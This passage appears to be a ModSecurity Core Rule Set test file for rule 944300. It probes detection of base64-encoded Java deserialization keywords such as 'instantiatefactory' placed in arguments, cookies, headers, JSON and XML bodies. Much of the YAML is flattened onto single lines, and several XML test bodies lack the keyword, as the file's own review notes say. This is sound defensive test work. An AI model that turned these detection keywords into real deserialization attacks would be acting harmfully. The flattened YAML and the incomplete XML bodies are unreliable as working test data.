"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=GZvcmNsb3N1cmU" output: log_contains: "id \"944300\"" - test_title: 944300-119 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: 
Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"GZvcmNsb3N1cmU\"}" output: log_contains: "id \"944300\"" - test_title: 944300-120 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"GZvcmNsb3N1cmU\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-121 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Bmb3JjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-122 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" 
Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl=test" output: log_contains: "id \"944300\"" - test_title: 944300-123 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Bmb3JjbG9zdXJl method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-124 desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Bmb3JjbG9zdXJl=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-125 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Bmb3JjbG9zdXJl method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-126 desc: 
"XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-127 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-128 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bmb3JjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-129 desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Bmb3JjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-130 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" output: log_contains: "id \"944300\"" - test_title: 944300-131 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-132 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGVmYWN0b3J5" output: log_contains: 
"id \"944300\"" - test_title: 944300-133 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5=test" output: log_contains: "id \"944300\"" - test_title: 944300-134 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-135 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-136 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: 
Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: aW5zdGFudGlhdGVmYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-137 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-138 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-139 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: 
"gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "aW5zdGFudGlhdGVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-140 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=aW5zdGFudGlhdGVmYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-141 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" output: log_contains: "id \"944300\"" - test_title: 944300-142 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" output: log_contains: "id 
\"944300\"" - test_title: 944300-143 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-144 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-145 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-146 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" 
User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-147 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Gluc3RhbnRpYXRlZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-148 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-149 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-150 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-151 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-152 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" output: 
log_contains: "id \"944300\""
  # Last probe for keyword Gluc3RhbnRpYXRlZmFjdG9yeQ, which is the base64 text of
  # "instantiatefactory" when one byte precedes it in the encoded stream.
  - test_title: 944300-153
    desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/json"
            method: "POST"
            version: "HTTP/1.0"
            data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}"
          output:
            log_contains: "id \"944300\""

  # Keyword BpbnN0YW50aWF0ZWZhY3Rvcnk: base64 text of "instantiatefactory" when two
  # bytes precede it in the encoded stream. Each test places the keyword in one
  # request location and expects id "944300" in the log.
  - test_title: 944300-154
    desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-155
    desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
            method: "POST"
            version: "HTTP/1.0"
            data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-156
    desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-157
    desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-158
    desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/x-www-form-urlencoded"
              test: BpbnN0YW50aWF0ZWZhY3Rvcnk
            method: "POST"
            version: "HTTP/1.0"
            data: "test=value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): desc names the keyword, but data is only "element_value", so the
  # request body carries no keyword; the XML markup looks lost from this copy.
  # Confirm the body against upstream before relying on this test.
  - test_title: 944300-159
    desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "element_value"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): Content-Type is application/xml but data is the bare keyword with
  # no XML elements around it; confirm the intended XML body.
  - test_title: 944300-160
    desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "BpbnN0YW50aWF0ZWZhY3Rvcnk"
          output:
            log_contains: "id \"944300\""
  # NOTE(review): data is identical to the non-nested case above (bare keyword, no
  # nesting visible); confirm the intended nested XML body.
  - test_title: 944300-161
    desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
              Accept-Encoding: "gzip,deflate"
              Accept-Language: "en-us,en;q=0.5"
              Content-Type: "application/xml"
            method: "POST"
            version: "HTTP/1.0"
            data: "BpbnN0YW50aWF0ZWZhY3Rvcnk"
          output:
            log_contains: "id \"944300\""
  - test_title: 944300-162
    desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk"
    stages:
      - stage:
